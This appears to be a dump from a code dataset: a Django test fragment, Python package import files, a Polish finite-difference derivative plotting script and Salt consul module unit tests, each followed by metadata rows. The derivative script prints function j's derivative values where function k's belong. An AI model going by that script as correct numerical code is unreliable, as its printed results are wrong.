self.fail('Found assessment')
except:
pass
response = self.authenticated_client.post(
'/assessment/',
json.dumps({
'project': project.id,
'target': target.id,
'rubric': rubric.id,
'answers': [
{
'metric': 1,
'answer': 0.0,
},
{
'metric': 2,
'answer': 0.0,
},
{
'metric': 3,
'answer': 0.0,
},
],
}),
content_type='application/json',
HTTP_ACCEPT='application/json',
)
self.assertEqual(response.status_code, 201)
self.assertEqual(response['Content-Type'], 'application/json', response)
self.assertEqual(
models.Assessment.objects.get(assessor=author, project=project, rubric=rubric, target=target).answers.count(),
3
)
| 35.634936 | 116 | 0.666859 | 4,033 | 36,312 | 5.902802 | 0.032482 | 0.119088 | 0.17777 | 0.112073 | 0.940141 | 0.921742 | 0.915694 | 0.908594 | 0.901915 | 0.896035 | 0 | 0.01207 | 0.187734 | 36,312 | 1,018 | 117 | 35.669941 | 0.79505 | 0.002148 | 0 | 0.739606 | 0 | 0 | 0.21252 | 0.031382 | 0 | 0 | 0 | 0 | 0.207877 | 1 | 0.040481 | false | 0.00547 | 0.007659 | 0 | 0.052516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7acbf7ba8209ac31cf381ad1c4a6d05939daf8d1 | 256 | py | Python | Flask/NationalEducationRadio/NationalEducationRadio/__init__.py | Jessieluu/WIRL_national_education_radio | edb8b63c25bc7bd5a9a7d074173f02913971f8a7 | [
"MIT"
] | null | null | null | Flask/NationalEducationRadio/NationalEducationRadio/__init__.py | Jessieluu/WIRL_national_education_radio | edb8b63c25bc7bd5a9a7d074173f02913971f8a7 | [
"MIT"
] | null | null | null | Flask/NationalEducationRadio/NationalEducationRadio/__init__.py | Jessieluu/WIRL_national_education_radio | edb8b63c25bc7bd5a9a7d074173f02913971f8a7 | [
"MIT"
] | null | null | null | from NationalEducationRadio.service import *
from NationalEducationRadio.controllers import *
from NationalEducationRadio.controllers.admin import *
from NationalEducationRadio.controllers.admin.ajax import *
from NationalEducationRadio.models.db import *
| 42.666667 | 59 | 0.867188 | 24 | 256 | 9.25 | 0.375 | 0.585586 | 0.576577 | 0.581081 | 0.432432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078125 | 256 | 5 | 60 | 51.2 | 0.940678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
24a139f7e0ddeba03f206c10f6183c5aec8adbfa | 41 | py | Python | src/test/resources/python-code-examples/from_importing_multidot.py | florayym/depends | 6c437a78268d91d54059b560c0273ae3c9253452 | [
"BSD-3-Clause",
"MIT"
] | 146 | 2019-03-09T03:02:59.000Z | 2022-03-28T11:28:41.000Z | src/test/resources/python-code-examples/from_importing_multidot.py | florayym/depends | 6c437a78268d91d54059b560c0273ae3c9253452 | [
"BSD-3-Clause",
"MIT"
] | 27 | 2019-03-11T02:12:54.000Z | 2021-12-21T00:24:13.000Z | src/test/resources/python-code-examples/from_importing_multidot.py | florayym/depends | 6c437a78268d91d54059b560c0273ae3c9253452 | [
"BSD-3-Clause",
"MIT"
] | 41 | 2019-03-09T03:04:50.000Z | 2022-01-14T06:53:14.000Z | import pkg.imported
pkg.imported.foo()
| 8.2 | 19 | 0.756098 | 6 | 41 | 5.166667 | 0.666667 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 41 | 4 | 20 | 10.25 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
24bf8df59097787799d06f011aea2cabb79e9c1c | 333 | py | Python | datapackage_pipelines_measure/pipeline_steps/__init__.py | pombredanne/measure | 17bdca2fd579f3090ba3b191a58af28b8fc395e4 | [
"MIT"
] | 16 | 2017-04-04T05:01:53.000Z | 2021-10-18T09:44:48.000Z | datapackage_pipelines_measure/pipeline_steps/__init__.py | pombredanne/measure | 17bdca2fd579f3090ba3b191a58af28b8fc395e4 | [
"MIT"
] | 44 | 2017-04-04T05:07:03.000Z | 2020-03-10T05:06:15.000Z | datapackage_pipelines_measure/pipeline_steps/__init__.py | pombredanne/measure | 17bdca2fd579f3090ba3b191a58af28b8fc395e4 | [
"MIT"
] | 5 | 2017-04-08T00:23:39.000Z | 2018-07-04T00:57:52.000Z | from . import (
social_media,
code_hosting,
code_packaging,
website_analytics,
outputs,
email,
forums,
forum_categories,
example
)
__all__ = ['social_media', 'code_hosting', 'code_packaging',
'website_analytics', 'outputs', 'email', 'forums',
'forum_categories', 'example']
| 20.8125 | 61 | 0.627628 | 31 | 333 | 6.290323 | 0.516129 | 0.112821 | 0.153846 | 0.225641 | 0.933333 | 0.933333 | 0.933333 | 0.933333 | 0.933333 | 0.933333 | 0 | 0 | 0.252252 | 333 | 15 | 62 | 22.2 | 0.783133 | 0 | 0 | 0 | 0 | 0 | 0.288288 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24edd2940a61588d892d3e67d7361eb9cb4742bf | 7,359 | py | Python | pochodna.py | Rafal14/Metody_numeryczne | 3ea9ac1bb9d3ce88c0fd0c758f7930228c610c94 | [
"MIT"
] | null | null | null | pochodna.py | Rafal14/Metody_numeryczne | 3ea9ac1bb9d3ce88c0fd0c758f7930228c610c94 | [
"MIT"
] | null | null | null | pochodna.py | Rafal14/Metody_numeryczne | 3ea9ac1bb9d3ce88c0fd0c758f7930228c610c94 | [
"MIT"
] | null | null | null | #-*-coding: utf-8 -*-
import numpy as np
from scipy.misc import derivative
import matplotlib.pyplot as pt
#Definicje funkcji
def f(x):
'''Zwraca wartość dla funkcji eksponencjalnej'''
return np.exp(x)
def g(x):
'''Zwraca wartość dla funkcji exp(-(x**2))'''
return np.exp((x**2)*(-1))
def j(x):
'''Zwraca wartość dla funkcji (x**2)*log(x)'''
logarytm=np.log10(x)
return (x**2)*logarytm
def k(x):
'''Zwraca wartość dla funkcji 1/((1 + x**2)**(1/2))'''
pierwiastek=np.sqrt(1 + (x**2))
return 1/pierwiastek
print "Przybliżanie pochodnej funkcji e^(x)"
print "Podaj przedział do obliczenia pochodnej"
#określenie przedziału
dolna_gr = float(raw_input("Dolna granica przedziału: "))
gorna_gr = float(raw_input("Górna granica przedziału: "))
#określa otoczenie punktu x0
h = (gorna_gr - dolna_gr)/2
#wyznaczenie środka przedziału
x0 = (dolna_gr + gorna_gr)/2
print "Środek przedziału x0 = ", x0
print "h = ", h
#wartość funkcji f w punkcie x0
wart_f_x0 = f(x0)
z1=dolna_gr-1
z2=gorna_gr+1
#zakres osi x
to = np.arange(z1,z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
#obliczenie pochodnej funkcji f w pkt x0
pochodnaf_Oh = (f(x0+h)-f(x0))/h
pochodnaf_Oh2= (f(x0+h)-f(x0-h))/(h*2)
#wypisanie przybliżenia wartości pochodnej w pkt x0
print "f'(x0) = ", pochodnaf_Oh, "z dok. O(h)"
print "f'(x0) = ", pochodnaf_Oh2, "z dok. O(h**2)"
#wykreślenie stycznych określonych przez pochodną funkcji
# f z dokładnością O(h) i O(h**2)
pt.figure(1)
wyk = pt.subplot(111)
#Wykreślenie charakterystyki funkcji exp(x)
wyk.plot(to, f(to), 'r', label='exp(x)')
wyk.grid(True)
wyk.hold(True)
#Wykreślenie stycznej do funkcji exp(x) z dokładnością O(h)
wyk.plot(t, pochodnaf_Oh*t + wart_f_x0, 'b', label='Przyblizenie pochodnej \nfunkcji exp(x) z dok. O(h)')
#Wykreślenie stycznej do funkcji exp(x) z dokładnością O(h^2)
wyk.plot(t, pochodnaf_Oh2 * t + wart_f_x0, 'k', label='Przyblizenie pochodnej \nfunkcji exp(x) z dok. O(h^2)')
#dodanie legendy
wyk.legend()
pt.xlabel('Czas [s]', fontsize=12, color='black')
pt.ylabel('Wartosc funkcji')
pt.title('Charakterystyka exp(x) i jej pochodne', fontsize=12, color='black')
pt.show()
#===============================================================================
print "\nPrzybliżanie pochodnej funkcji e^(-x**2)"
print "Podaj przedział do obliczenia pochodnej"
#określenie przedziału
dolna_gr = float(raw_input("Dolna granica przedziału: "))
gorna_gr = float(raw_input("Górna granica przedziału: "))
#określa otoczenie punktu x0
h = (gorna_gr - dolna_gr)/2
#wyznaczenie środka przedziału
x0 = (dolna_gr + gorna_gr)/2
print "Środek przedziału x0 = ", x0
print "h = ", h
#wartość funkcji g w punkcie x0
wart_g_x0 = g(x0)
z1=dolna_gr-1
z2=gorna_gr+1
#zakres osi x
to = np.arange(z1,z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
#obliczenie pochodnej funkcji g w pkt x0
pochodnag_Oh = (g(x0+h)-g(x0))/h
pochodnag_Oh2= (g(x0+h)-g(x0-h))/(h*2)
#wypisanie przybliżenia wartości pochodnej w pkt x0
print "g'(x0) = ", pochodnag_Oh, "z dok. O(h)"
print "g'(x0) = ", pochodnag_Oh2, "z dok. O(h**2)"
#wykreślenie stycznych określonych przez pochodną funkcji
# g z dokładnością O(h) i O(h**2)
pt.figure(2)
wyk = pt.subplot(111)
#Wykreślenie charakterystyki funkcji exp(-x**2)
wyk.plot(to, g(to), 'r', label='exp(-x**2)')
wyk.grid(True)
wyk.hold(True)
#Wykreślenie stycznej do funkcji exp(-x**2) z dokładnością O(h)
wyk.plot(t, pochodnag_Oh*t + wart_g_x0, 'b', label='Przyblizenie pochodnej \nfunkcji exp(-x**2) z dok. O(h)')
#Wykreślenie stycznej do funkcji exp(x) z dokładnością O(h^2)
wyk.plot(t, pochodnag_Oh2 * t + wart_g_x0, 'k', label='Przyblizenie pochodnej \nfunkcji exp(-x**2) z dok. O(h^2)')
#dodanie legendy
wyk.legend()
pt.xlabel('Czas [s]', fontsize=12, color='black')
pt.ylabel('Wartosc funkcji')
pt.title('Charakterystyka exp(-x**2) i jej pochodne', fontsize=12, color='black')
pt.show()
#====================================================================
print "\nPrzybliżanie pochodnej funkcji (x^2)log(x)"
print "Podaj przedział do obliczenia pochodnej"
#określenie przedziału
dolna_gr = float(raw_input("Dolna granica przedziału: "))
gorna_gr = float(raw_input("Górna granica przedziału: "))
#określa otoczenie punktu x0
h = (gorna_gr - dolna_gr)/2
#wyznaczenie środka przedziału
x0 = (dolna_gr + gorna_gr)/2
print "Środek przedziału x0 = ", x0
print "h = ", h
#wartość funkcji j w punkcie x0
wart_j_x0 = j(x0)
z1=0.001
z2=gorna_gr+1
#zakres osi x
to = np.arange(z1,z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
#obliczenie pochodnej funkcji j w pkt x0
pochodnaj_Oh = (j(x0+h)-j(x0))/h
pochodnaj_Oh2= (j(x0+h)-j(x0-h))/(h*2)
#wypisanie przybliżenia wartości pochodnej w pkt x0
print "j'(x0) = ", pochodnaj_Oh, "z dok. O(h)"
print "j'(x0) = ", pochodnaj_Oh2, "z dok. O(h**2)"
#wykreślenie stycznych określonych przez pochodną funkcji
# j z dokładnością O(h) i O(h**2)
pt.figure(3)
wyk = pt.subplot(111)
#Wykreślenie charakterystyki funkcji (x^2)log(x)
wyk.plot(to, j(to), 'r', label='(x**2)log(x)')
wyk.grid(True)
wyk.hold(True)
#Wykreślenie stycznej do funkcji (x**2)log(x) z dokładnością O(h)
wyk.plot(t, pochodnaj_Oh*t + wart_j_x0, 'b', label='Przyblizenie pochodnej \nfunkcji (x**2)log(x) z dok. O(h)')
#Wykreślenie stycznej do funkcji (x**2)log(x) z dokładnością O(h^2)
wyk.plot(t, pochodnaj_Oh2 * t + wart_j_x0, 'k', label='Przyblizenie pochodnej \nfunkcji (x**2)log(x) z dok. O(h^2)')
#dodanie legendy
wyk.legend()
pt.xlabel('Czas [s]', fontsize=12, color='black')
pt.ylabel('Wartosc funkcji')
pt.title('Charakterystyka (x**2)log(x) i jej pochodne', fontsize=12, color='black')
pt.show()
#====================================================================
print "\nPrzybliżanie pochodnej funkcji 1/(sqrt(1 + x^2))"
print "Podaj przedział do obliczenia pochodnej"
#określenie przedziału
dolna_gr = float(raw_input("Dolna granica przedziału: "))
gorna_gr = float(raw_input("Górna granica przedziału: "))
#określa otoczenie punktu x0
h = (gorna_gr - dolna_gr)/2
#wyznaczenie środka przedziału
x0 = (dolna_gr + gorna_gr)/2
print "Środek przedziału x0 = ", x0
print "h = ", h
#wartość funkcji k w punkcie x0
wart_k_x0 = k(x0)
z1=dolna_gr-1
z2=gorna_gr+1
#zakres osi x
to = np.arange(z1,z2, 0.1)
t = np.arange(dolna_gr, gorna_gr, 0.1)
#obliczenie pochodnej funkcji k w pkt x0
pochodnak_Oh = (k(x0+h)-k(x0))/h
pochodnak_Oh2= (k(x0+h)-k(x0-h))/(h*2)
#wypisanie przybliżenia wartości pochodnej w pkt x0
print "k'(x0) = ", pochodnaj_Oh, "z dok. O(h)"
print "k'(x0) = ", pochodnaj_Oh2, "z dok. O(h**2)"
#wykreślenie stycznych określonych przez pochodną funkcji
# k z dokładnością O(h) i O(h**2)
pt.figure(4)
wyk = pt.subplot(111)
#Wykreślenie charakterystyki funkcji 1/(sqrt(1 + x^2))
wyk.plot(to, k(to), 'r', label='1/(sqrt(1 + x**2))')
wyk.grid(True)
wyk.hold(True)
#Wykreślenie stycznej do funkcji (x**2)log(x) z dokładnością O(h)
wyk.plot(t, pochodnak_Oh*t + wart_k_x0, 'b', label='Przyb. pochodnej \nfunkcji 1/(sqrt(1 + x**2)) z dok. O(h)')
#Wykreślenie stycznej do funkcji (x**2)log(x) z dokładnością O(h^2)
wyk.plot(t, pochodnak_Oh2 * t + wart_k_x0, 'k', label='Przyb. pochodnej \nfun. 1/(sqrt(1 + x**2)) z dok. O(h^2)')
#dodanie legendy
wyk.legend()
pt.xlabel('Czas [s]', fontsize=12, color='black')
pt.ylabel('Wartosc funkcji')
pt.title('Charakterystyka 1/(sqrt(1 + x**2)) i jej pochodne', fontsize=12, color='black')
pt.show() | 30.409091 | 116 | 0.677674 | 1,252 | 7,359 | 3.907348 | 0.104633 | 0.013083 | 0.016353 | 0.019624 | 0.8426 | 0.808872 | 0.786999 | 0.762674 | 0.748774 | 0.725061 | 0 | 0.036551 | 0.130045 | 7,359 | 242 | 117 | 30.409091 | 0.727585 | 0.296779 | 0 | 0.550388 | 0 | 0.023256 | 0.32907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.023256 | null | null | 0.186047 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
700997ac4414ff4fb1c60483b6e3c0b84304227b | 69,111 | py | Python | tests/pytests/unit/modules/test_consul.py | tomdoherty/salt | f87d5d7abbf9777773c4d91fdafecb8b1a728e76 | [
"Apache-2.0"
] | 1 | 2022-03-12T00:01:53.000Z | 2022-03-12T00:01:53.000Z | tests/pytests/unit/modules/test_consul.py | tomdoherty/salt | f87d5d7abbf9777773c4d91fdafecb8b1a728e76 | [
"Apache-2.0"
] | 2 | 2022-03-02T16:11:35.000Z | 2022-03-03T08:04:30.000Z | tests/pytests/unit/modules/test_consul.py | tomdoherty/salt | f87d5d7abbf9777773c4d91fdafecb8b1a728e76 | [
"Apache-2.0"
] | null | null | null | """
Test case for the consul execution module
"""
import logging
import pytest
import salt.modules.consul as consul
import salt.utils.http
import salt.utils.json
import salt.utils.platform
from salt.exceptions import SaltInvocationError
from tests.support.mock import MagicMock, patch
log = logging.getLogger(__name__)
@pytest.fixture
def configure_loader_modules():
return {
consul: {
"__opts__": {"consul": {"url": "http://127.0.0.1", "token": "test_token"}},
"__grains__": {"id": "test-minion"},
}
}
def test_list():
"""
Test salt.modules.consul.list function
"""
mock_query = MagicMock(return_value={"data": ["foo"], "res": True})
with patch.object(consul, "_query", mock_query):
consul_return = consul.list_(consul_url="http://127.0.0.1", token="test_token")
assert consul_return == {"data": ["foo"], "res": True}
def test_get():
"""
Test salt.modules.consul.get function
"""
#
# No key argument results in SaltInvocationError, exception
#
with pytest.raises(SaltInvocationError):
consul.put(consul_url="http://127.0.0.1", token="test_token")
mock_query = MagicMock(
return_value={
"data": [
{
"LockIndex": 0,
"Key": "foo",
"Flags": 0,
"Value": "YmFy",
"CreateIndex": 128,
"ModifyIndex": 128,
},
],
"res": True,
}
)
with patch.object(consul, "_query", mock_query):
consul_return = consul.get(
consul_url="http://127.0.0.1", key="foo", token="test_token"
)
_expected = {
"data": [
{
"CreateIndex": 128,
"Flags": 0,
"Key": "foo",
"LockIndex": 0,
"ModifyIndex": 128,
"Value": "YmFy",
}
],
"res": True,
}
assert consul_return == _expected
mock_query = MagicMock(
return_value={
"data": [
{
"LockIndex": 0,
"Key": "foo",
"Flags": 0,
"Value": "b'bar'",
"CreateIndex": 128,
"ModifyIndex": 128,
},
],
"res": True,
}
)
with patch.object(consul, "_query", mock_query):
consul_return = consul.get(
consul_url="http://127.0.0.1", key="foo", token="test_token"
)
_expected = {
"data": [
{
"CreateIndex": 128,
"Flags": 0,
"Key": "foo",
"LockIndex": 0,
"ModifyIndex": 128,
"Value": "b'bar'",
}
],
"res": True,
}
assert consul_return == _expected
def test_put():
"""
Test salt.modules.consul.put function
"""
#
# No key argument results in SaltInvocationError, exception
#
with pytest.raises(SaltInvocationError):
consul.put(consul_url="http://127.0.0.1", token="test_token")
#
# Test when we're unable to connect to Consul
#
mock_consul_get = {
"data": [
{
"LockIndex": 0,
"Key": "web/key1",
"Flags": 0,
"Value": "ImhlbGxvIHRoZXJlIg==",
"CreateIndex": 299,
"ModifyIndex": 299,
}
],
"res": True,
}
with patch.object(consul, "session_list", MagicMock(return_value=[])):
with patch.object(consul, "get", MagicMock(return_value=mock_consul_get)):
ret = consul.put(
consul_url="http://127.0.0.1:8501",
token="test_token",
key="web/key1",
value="Hello world",
)
expected_res = (False,)
expected_data = "Unable to add key web/key1 with value Hello world."
if salt.utils.platform.is_windows():
expected_error = "Unknown error"
else:
expected_error = "Connection refused"
assert not ret["res"]
assert expected_data == ret["data"]
assert expected_error in ret["error"]
#
# Working as expected
#
mock_query = MagicMock(
return_value={
"data": [
{
"LockIndex": 0,
"Key": "foo",
"Flags": 0,
"Value": "YmFy",
"CreateIndex": 128,
"ModifyIndex": 128,
},
],
"res": True,
}
)
with patch.object(consul, "session_list", MagicMock(return_value=[])):
with patch.object(consul, "get", MagicMock(return_value=mock_consul_get)):
with patch.object(consul, "_query", mock_query):
ret = consul.put(
consul_url="http://127.0.0.1:8500",
token="test_token",
key="web/key1",
value="Hello world",
)
_expected = {"res": True, "data": "Added key web/key1 with value Hello world."}
assert ret == _expected
def test_delete():
"""
Test salt.modules.consul.delete function
"""
#
# No key argument results in SaltInvocationError, exception
#
with pytest.raises(SaltInvocationError):
consul.put(consul_url="http://127.0.0.1", token="test_token")
#
# Test when we're unable to connect to Consul
#
ret = consul.delete(
consul_url="http://127.0.0.1:8501",
token="test_token",
key="web/key1",
value="Hello world",
)
expected_res = (False,)
expected_data = "Unable to delete key web/key1."
if salt.utils.platform.is_windows():
expected_error = "Unknown error"
else:
expected_error = "Connection refused"
assert not ret["res"]
assert expected_data == ret["message"]
assert expected_error in ret["error"]
#
# Working as expected
#
mock_query = MagicMock(return_value={"data": True, "res": True})
with patch.object(consul, "_query", mock_query):
ret = consul.delete(
consul_url="http://127.0.0.1:8500",
token="test_token",
key="web/key1",
value="Hello world",
)
_expected = {"res": True, "message": "Deleted key web/key1."}
assert ret == _expected
def test_agent_maintenance():
"""
Test consul agent maintenance
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_maintenance(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required argument
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = 'Required parameter "enable" is missing.'
result = consul.agent_maintenance(consul_url=consul_url)
expected = {"message": msg, "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Agent maintenance mode {}ed."
value = "enabl"
result = consul.agent_maintenance(consul_url=consul_url, enable=value)
expected = {"message": msg.format(value), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to change maintenance mode for agent."
value = "enabl"
result = consul.agent_maintenance(consul_url=consul_url, enable=value)
expected = {"message": msg, "res": True}
assert expected == result
def test_agent_join():
"""
Test consul agent join
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_join(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
# no required argument
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = 'Required parameter "address" is missing.'
pytest.raises(
SaltInvocationError, consul.agent_join, consul_url=consul_url
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Agent joined the cluster"
result = consul.agent_join(consul_url=consul_url, address="test")
expected = {"message": msg, "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to join the cluster."
value = "enabl"
result = consul.agent_join(consul_url=consul_url, address="test")
expected = {"message": msg, "res": False}
assert expected == result
def test_agent_leave():
"""
Test consul agent leave
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_join(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
node = "node1"
# no required argument
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError, consul.agent_leave, consul_url=consul_url
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Node {} put in leave state."
result = consul.agent_leave(consul_url=consul_url, node=node)
expected = {"message": msg.format(node), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to change state for {}."
result = consul.agent_leave(consul_url=consul_url, node=node)
expected = {"message": msg.format(node), "res": False}
assert expected == result
def test_agent_check_register():
"""
Test consul agent check register
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_check_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
name = "name1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_register,
consul_url=consul_url,
)
# missing script, or http
msg = 'Required parameter "script" or "http" is missing.'
result = consul.agent_check_register(consul_url=consul_url, name=name)
expected = {"message": msg, "res": False}
assert expected == result
# missing interval
msg = 'Required parameter "interval" is missing.'
result = consul.agent_check_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
)
expected = {"message": msg, "res": False}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} added to agent."
result = consul.agent_check_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to add check to agent."
result = consul.agent_check_register(
consul_url=consul_url,
name=name,
script="test",
http="test",
ttl="test",
interval="test",
)
expected = {"message": msg.format(name), "res": False}
assert expected == result
def test_agent_check_deregister():
"""
Test consul agent check register
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_check_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_deregister,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Check {} removed from agent."
result = consul.agent_check_deregister(
consul_url=consul_url, checkid=checkid
)
expected = {"message": msg.format(checkid), "res": True}
assert expected == result
with patch.object(salt.utils.http, "query", return_value=mock_http_result_false):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
msg = "Unable to remove check from agent."
result = consul.agent_check_deregister(
consul_url=consul_url, checkid=checkid
)
expected = {"message": msg.format(checkid), "res": False}
assert expected == result
def test_agent_check_pass():
"""
Test consul agent check pass
"""
consul_url = "http://localhost:1313"
key = "cluster/key"
mock_result = "test"
mock_http_result = {"status": 200, "dict": mock_result}
mock_http_result_false = {"status": 204, "dict": mock_result}
mock_url = MagicMock(return_value=consul_url)
mock_nourl = MagicMock(return_value=None)
# no consul url error
with patch.dict(consul.__salt__, {"config.get": mock_nourl}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
result = consul.agent_check_register(consul_url="")
expected = {"message": "No Consul URL found.", "res": False}
assert expected == result
checkid = "id1"
# no required arguments
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
with patch.dict(consul.__salt__, {"config.get": mock_url}):
with patch.object(
salt.modules.consul, "session_list", return_value=mock_result
):
pytest.raises(
SaltInvocationError,
consul.agent_check_pass,
consul_url=consul_url,
)
with patch.object(salt.utils.http, "query", return_value=mock_http_result):
